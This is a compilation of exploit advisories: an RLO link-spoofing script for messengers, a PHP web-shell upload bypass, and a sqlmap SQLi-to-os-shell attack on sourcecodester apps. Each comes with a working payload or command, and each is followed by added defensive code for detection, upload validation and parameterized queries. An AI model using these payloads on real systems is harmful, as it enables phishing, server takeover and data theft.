Messenger app Android <br /># Version: 228.1.0.10.116 and below<br /># Tested on: Signal<br /># Version: 5.33.0.25 and below<br /># CVE: CVE-2020-20093<br /># CVE: CVE-2020-20094<br /># CVE: CVE-2020-20095<br /># CVE: CVE-2020-20096<br /><br /><br />#!/bin/bash<br /># Author: sickcodes<br /># Contact: https://twitter.com/sickcodes https://github.com/sickcodes<br /># Copyright: sickcodes (C) 2022<br /># License: GPLv3+<br /><br /># References: https://github.com/zadewg/RIUS<br /># https://github.com/sickcodes/security/blob/master/exploits/SICK-2022-40.sh<br /># https://sick.codes/sick-2022-40<br /><br /><br />APPEAR_AS='https://google.com'<br /><br /><br />DESTINATION='bit.ly/3ixIRwm'<br /><br /><br />printf "\n\n${APPEAR_AS}/\u202E${DESTINATION}\n\n"<br /><br /><br /># copy paste into any of the above apps.<br /># victim will see a surreptitious link<br /><br /><br /># works on latest Signal (unpatched)<br /></code></pre>
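The payload above is `https://google.com/` followed by U+202E (RIGHT-TO-LEFT OVERRIDE) and the real path `bit.ly/3ixIRwm`; a client that honours the override draws everything after it right-to-left, so the reader sees a google.com link. The following is an added example, not part of the advisory or of the RIUS tool: it finds Unicode bidi control characters in a message or link, strips them (the mitigation a client or gateway should apply before display or linkification), and approximates the spoofed rendering by reversing the overridden run. The preview is a simplification of the Unicode bidi algorithm, sufficient for Latin-script URLs like this one.

```python
import unicodedata
from typing import List, Tuple

# Explicit bidi formatting characters: embeddings, overrides, isolates, terminators, marks.
BIDI_CONTROLS = {
    "\u202A", "\u202B", "\u202C", "\u202D", "\u202E",   # LRE, RLE, PDF, LRO, RLO
    "\u2066", "\u2067", "\u2068", "\u2069",             # LRI, RLI, FSI, PDI
    "\u200E", "\u200F", "\u061C",                       # LRM, RLM, ALM
}

# The link from the advisory (constructed here from its two parts).
SPOOFED_LINK = "https://google.com/" + "\u202E" + "bit.ly/3ixIRwm"


def find_bidi_controls(text: str) -> List[Tuple[int, str]]:
    """Return (index, Unicode name) for every bidi control character in text."""
    return [(i, unicodedata.name(ch)) for i, ch in enumerate(text) if ch in BIDI_CONTROLS]


def is_spoofed_link(text: str) -> bool:
    """A URL or chat message that carries any bidi control deserves a warning or rejection."""
    return bool(find_bidi_controls(text))


def strip_bidi_controls(text: str) -> str:
    """Mitigation: drop the controls so the text renders as it will be parsed."""
    return "".join(ch for ch in text if ch not in BIDI_CONTROLS)


def visual_preview(text: str) -> str:
    """Approximate what a reader sees: a run after U+202E is drawn reversed
    until the next U+202C (POP DIRECTIONAL FORMATTING) or the end of the text."""
    out: List[str] = []
    i = 0
    while i < len(text):
        ch = text[i]
        if ch == "\u202E":
            end = text.find("\u202C", i + 1)
            if end == -1:
                end = len(text)
            out.append(text[i + 1:end][::-1])
            i = end + 1
        else:
            out.append(ch)
            i += 1
    return "".join(out)


if __name__ == "__main__":
    print("controls found:", find_bidi_controls(SPOOFED_LINK))
    print("reader sees   :", visual_preview(SPOOFED_LINK))
    print("after strip   :", strip_bidi_controls(SPOOFED_LINK))
```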
<pre><code># Title: Event Management System 1.0 Shell Upload<br /># Author: Hejap Zairy<br /># Date: 24.07.2022<br /># Vendor: https://www.sourcecodester.com/php/15238/event-management-system-project-php-source-code.html<br /># Software: https://www.sourcecodester.com/sites/default/files/download/oretnom23/Royal%20Event.zip<br /># Reference: https://github.com/Matrix07ksa<br /># Tested on: Windows, MySQL, Apache<br /><br />A registered user can bypass the upload filter (WAF) and upload .php.png files in the attachments section by using an intercepting proxy such as Burp Suite to edit the raw request.<br /><br /># Vulnerable PHP code<br />The profile image upload needs more filtering:<br /><br />```php<br />if(isset($_POST['submit']))<br />{<br />    $adminid=$_SESSION['odmsaid'];<br />    $productname=$_POST['productName'];<br />    $productimage1=$_FILES["productimage1"]["name"];<br />    // The client-supplied filename is used as-is: no extension, MIME or content check<br />    move_uploaded_file($_FILES["productimage1"]["tmp_name"],"assets/img/profileimages/".$_FILES["productimage1"]["name"]);<br />    $sql="update tbladmin set Photo=:productimage1 where ID=:aid";<br />    $query = $dbh->prepare($sql);<br />    $query->bindParam(':productimage1',$productimage1,PDO::PARAM_STR);<br />    $query->bindParam(':aid',$pid,PDO::PARAM_STR);<br />    $query->execute();<br />    $_SESSION['msg']="profile Image Updated Successfully !!";<br />}<br />?><br />```<br /><br />[+] Payload POST<br /><br />```<br />POST /scbs/?p=manage_account HTTP/1.1<br />Host: 0day.gov<br />Cookie: PHPSESSID=2vah9hmhjf85ichdav814rhcgu<br />User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8<br />Accept-Language: en-US,en;q=0.5<br />Accept-Encoding: gzip, deflate<br />Content-Type: multipart/form-data; boundary=---------------------------409902128312379197203124536738<br />Content-Length: 882<br />Origin: https://0day.gov<br />Referer: https://0day.gov/scbs/<br />Upgrade-Insecure-Requests: 1<br />Te: trailers<br />Connection: 
close<br /><br />-----------------------------409902128312379197203124536738<br />Content-Disposition: form-data; name="productName"<br />Hejap Zairy<br />-----------------------------409902128312379197203124536738<br />Content-Disposition: form-data; name="productimage1"; filename="0day_hejap.php"<br />Content-Type: image/png<br /><br /><?=`$_GET[515]`?><br /><br />-----------------------------409902128312379197203124536738<br />Content-Disposition: form-data; name="submit"<br />-----------------------------409902128312379197203124536738--<br />```<br /><br /><br />#Status: CRITICAL<br /><br />[+] Payload GET<br /><br />```<br />GET /Royal%20Event/royal_event/assets/img/profileimages/0day_hejap.php?515=echo+Hejap+Zairy HTTP/1.1<br /><br />Host: 0day.gov<br />User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8<br />Accept-Language: en-US,en;q=0.5<br />Accept-Encoding: gzip, deflate<br />Connection: close<br />Cookie: PHPSESSID=pqbgvck1gedt9if6p582nt9a41<br />Upgrade-Insecure-Requests: 1<br /><br /><br /><br /><br />```<br /><br />#Response <br />```<br />HTTP/1.1 200 OK<br />Date: Thu, 24 Mar 2022 11:15:56 GMT<br />Server: Apache/2.4.52 (Win64) OpenSSL/1.1.1m PHP/7.4.27<br />X-Powered-By: PHP/7.4.27<br />Content-Length: 12<br />Connection: close<br />Content-Type: text/html; charset=UTF-8<br /><br />Hejap Zairy<br />```<br /><br /><br /># Description:<br />The file upload bypass WAF vulnerability occurs when the user uploads an executable script file, and through the script file to obtain the ability to execute server-side commands. This attack is the most direct and effective, sometimes having almost no technical barriers.<br /><br /><br /># Proof and Exploit:<br />https://i.imgur.com/Q85LFQy.png<br />https://i.imgur.com/w7B8uAf.png<br /><br /></code></pre>
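<p>Added example, not the project's code: the validation that the move_uploaded_file() handler above lacks. It shows why a filter keyed on the client's Content-Type is bypassed by the captured request (a .php filename declared as image/png), and a hardened check that allow-lists a single extension, verifies the content's magic bytes and never reuses the client's filename. The function names, the allow-list and the sample inputs are assumptions for illustration.</p>

```python
"""Added example (not the vendor's code): upload validation the handler above is missing."""
import os
import secrets

# Allow-list: the only permitted extensions and the magic bytes each file must start with.
ALLOWED = {
    "png": b"\x89PNG\r\n\x1a\n",
    "jpg": b"\xff\xd8\xff",
    "jpeg": b"\xff\xd8\xff",
    "gif": b"GIF8",
}


def naive_check(filename: str, declared_mime: str) -> bool:
    """What a filter keyed on the multipart Content-Type header does: the attacker
    controls that header, so 0day_hejap.php declared as image/png passes."""
    return declared_mime.startswith("image/")


def validate_upload(filename: str, declared_mime: str, content: bytes) -> tuple[bool, str]:
    """Server-side validation: ignore declared_mime entirely, require exactly one
    extension (Apache can hand x.php.png to the PHP handler), allow-list it and
    verify the content's magic bytes. Returns (ok, reason_or_extension)."""
    base = os.path.basename(filename.replace("\\", "/"))
    parts = base.lower().split(".")
    if len(parts) != 2 or not parts[0]:
        return False, "filename must be name.ext with exactly one extension"
    ext = parts[1]
    if ext not in ALLOWED:
        return False, f"extension .{ext} not allowed"
    if not content.startswith(ALLOWED[ext]):
        return False, f"content is not a valid {ext} image"
    return True, ext


def storage_name(ext: str) -> str:
    """Never store under the client's name: random name plus the validated extension."""
    return f"{secrets.token_hex(16)}.{ext}"


# Constructed sample inputs: the advisory's web shell body and a minimal PNG header.
WEBSHELL = b"<?=`$_GET[515]`?>"
PNG = b"\x89PNG\r\n\x1a\n" + b"\x00" * 16

if __name__ == "__main__":
    print("naive filter, advisory request :", naive_check("0day_hejap.php", "image/png"))
    print("hardened, 0day_hejap.php       :", validate_upload("0day_hejap.php", "image/png", WEBSHELL))
    print("hardened, 0day_hejap.php.png   :", validate_upload("0day_hejap.php.png", "image/png", PNG))
    print("hardened, avatar.png w/ shell  :", validate_upload("avatar.png", "image/png", WEBSHELL))
    ok, ext = validate_upload("avatar.png", "application/octet-stream", PNG)
    print("hardened, real png             :", ok, storage_name(ext))
```

<p>The directory the files land in should additionally be served with script execution disabled (for Apache, a php_admin_flag engine off or removing the PHP handler for that path), so that even a validation slip does not turn an upload into code execution.</p>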
<pre><code># Title: Microfinance Management System 1.0 SQLi To Rce<br /># Author: Hejap Zairy<br /># Date: 24.07.2022<br /># Vendor: https://www.sourcecodester.com/php/14822/microfinance-management-system.html<br /># Software: https://www.sourcecodester.com/sites/default/files/download/oretnom23/mims_0.zip<br /># Reference: https://github.com/Matrix07ksa<br /># Tested on: Windows, MySQL, Apache<br /><br /><br /><br />#vulnerability Code php<br /><br />```php<br /> <?php<br /> // Fragment quoted by the author. Note that the injectable parameter sqlmap reports below,<br /> // account_type_number (GET), is not referenced in this fragment.<br /> $sql = "SELECT count(*) AS total_account FROM account_type";<br /> $result = mysqli_query($conn, $sql);<br /> $data = mysqli_fetch_assoc($result);<br /> ?><br />```<br /><br /><br /><br /><br />#Status: CRITICAL<br />```<br />GET parameter 'account_type_number' is vulnerable. Do you want to keep testing the others (if any)? [y/N] y<br />sqlmap identified the following injection point(s) with a total of 147 HTTP(s) requests:<br />---<br />Parameter: account_type_number (GET)<br /> Type: UNION query<br /> Title: MySQL UNION query (random number) - 3 columns<br /> Payload: account_type_number=-6015' UNION ALL SELECT 7366,CONCAT(0x716b626b71,0x4268666c6b715274794a58534f487366546e5379414951584a684459764f424451536f5a707a6a6a,0x7170707a71),7366#<br />---<br /><br />```<br />#SQLi to RCE<br />#Exploit<br /><br /><br />sqlmap -u 'http://0day.gov/mims/updateaccount_type.php?account_type_number=6015' --hex --time-sec=17 --dbms=mysql --technique=u --random-agent --eta -p account_type_number -D mims -T users --dump --os-shell<br /><br /># Description:<br />The blind time-based SQLi vulnerability was converted to RCE due to the permissions I had in the database, and it was a privilege escalation.<br /><br /># Proof and Exploit:<br />https://i.imgur.com/kRcQmxO.png<br />https://i.imgur.com/4RmKSom.png<br /><br /></code></pre>
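<p>Added example, not the project's code: a SQLite re-creation of the UNION-based injection sqlmap reports above, beside the parameterized query that closes it. The schema, the sample rows and the function names are assumptions; the payload keeps sqlmap's shape (negative id, three columns, data carried in the middle column) with MySQL's CONCAT(0x..) and # comment swapped for SQLite's || operator and -- comment so that it runs offline.</p>

```python
"""Added example (not the vendor's code): string-built query vs. bound parameter,
driven with a UNION payload of the shape sqlmap reported. SQLite stands in for MySQL."""
import sqlite3


def setup() -> sqlite3.Connection:
    """Constructed sample database: a 3-column account_type table (sqlmap found
    three UNION columns) and a users table worth dumping."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE account_type(account_type_number INTEGER, name TEXT, rate REAL);
        INSERT INTO account_type VALUES (6015, 'Savings', 2.5);
        CREATE TABLE users(id INTEGER, username TEXT, password TEXT);
        INSERT INTO users VALUES (1, 'admin', 'hash-of-admin-password');
    """)
    return conn


def lookup_vulnerable(conn: sqlite3.Connection, account_type_number: str) -> list:
    """Same mistake as the advisory: the GET parameter is interpolated into the SQL text."""
    sql = ("SELECT account_type_number, name, rate FROM account_type "
           f"WHERE account_type_number = '{account_type_number}'")
    return conn.execute(sql).fetchall()


def lookup_safe(conn: sqlite3.Connection, account_type_number: str) -> list:
    """Fix: a bound parameter is data, never SQL, whatever characters it contains."""
    sql = ("SELECT account_type_number, name, rate FROM account_type "
           "WHERE account_type_number = ?")
    return conn.execute(sql, (account_type_number,)).fetchall()


# sqlmap's UNION payload adapted to SQLite: -6015 empties the first SELECT, the
# second column carries the stolen data, and '-- ' comments out the trailing quote.
UNION_PAYLOAD = "-6015' UNION ALL SELECT 7366, username || ':' || password, 7366 FROM users -- "


def demo() -> tuple[list, list]:
    """Run the same payload through both query builders and return both results."""
    conn = setup()
    return lookup_vulnerable(conn, UNION_PAYLOAD), lookup_safe(conn, UNION_PAYLOAD)


if __name__ == "__main__":
    leaked, safe = demo()
    print("vulnerable:", leaked)   # users table rows come back through the account lookup
    print("safe      :", safe)     # the payload is just an unmatched string value
```

<p>The step from dump to --os-shell in the advisory depends on the MySQL account the application uses: sqlmap writes its stager with SELECT ... INTO OUTFILE, which needs the FILE privilege, a secure_file_priv setting that permits writing into the web root, and a known web-root path. Running the application under a least-privilege database user removes that path even where an injection remains.</p>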
